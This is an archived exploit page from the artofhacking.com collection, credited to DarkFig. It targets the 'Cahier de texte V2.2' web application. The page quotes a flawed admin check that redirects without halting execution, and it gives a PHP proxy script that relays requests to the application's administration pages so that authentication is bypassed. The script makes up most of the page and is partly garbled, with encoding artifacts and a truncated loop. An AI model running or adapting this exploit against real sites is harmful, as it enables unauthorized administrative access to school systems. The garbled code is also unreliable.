AOH :: HP Unsorted C :: C07-1483.HTM

Cahier de texte V2.2 Bypass general access protection exploit



Cahier de texte V2.2 Bypass general access protection exploit
Cahier de texte V2.2 Bypass general access protection exploit



www.etab.ac-caen.fr/bsauveur/cahier_de_texte/ 
  Poc.link......: acid-root.new.fr/poc/17061224.txt
  Credits.......: DarkFig

  Vulnerable code
  ==============  'Administrateur') { header("Location: ../index.php");}
  ;} else { header("Location: ../index.php");}?>
  ...

*/

if(!isset($_GET['host']) || empty($_GET['host'])) headers();
if(!isset($_GET['wanted'])) $wanted = 'index.php';

$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
echo sockxp($host,$path,$prox,"administration/".$wanted);
exit(0);

function headers()
{
	print("

 Cahier de texte V2.2 Exploit


 
"); exit(0); } function sockxp($host,$path,$prox,$wanted) { $hope = !empty($prox) ? $prox : $host.':80'; preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta); $hosh = $hosta[1]; $hosp = $hosta[2]; =09 $recv = ''; $meth = $_SERVER['REQUEST_METHOD']; if(empty($hosh) || empty($hosp)) exit(1); if(!$sock = fsockopen($hosh,$hosp)) exit(1); $dat = $meth." http://".$host; =09 if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted); else $dat .= $path.$wanted; =09 $dat .= " HTTP/1.1\r\n"; $dat .= "Host: $host\r\n"; $dat .= "Connection: Close\r\n"; =09 if($meth === "POST") { $postdata = get_postdata(); $dat .= "Content-Type: application/x-www-form-urlencoded\r\n"; $dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n"; $dat .= $postdata."\r\n\r\n"; } else { $dat .= "\r\n"; } fputs($sock,$dat); while(!feof($sock)) $recv .= fgets($sock); fclose($sock); return html_replace($recv); } function html_replace($htmlc) { global $host,$path,$prox; $iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted="; $newc = str_replace("action=\"","action=\"$iniv",$htmlc); $newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc); $newc = str_replace("a href=\"","a href=\"$iniv",$newc); $newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc); $newc = explode("\n",$newc); for($i=0;$i $value) { $postdata .= $key."=".$value."&"; } return $postdata; } ?>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.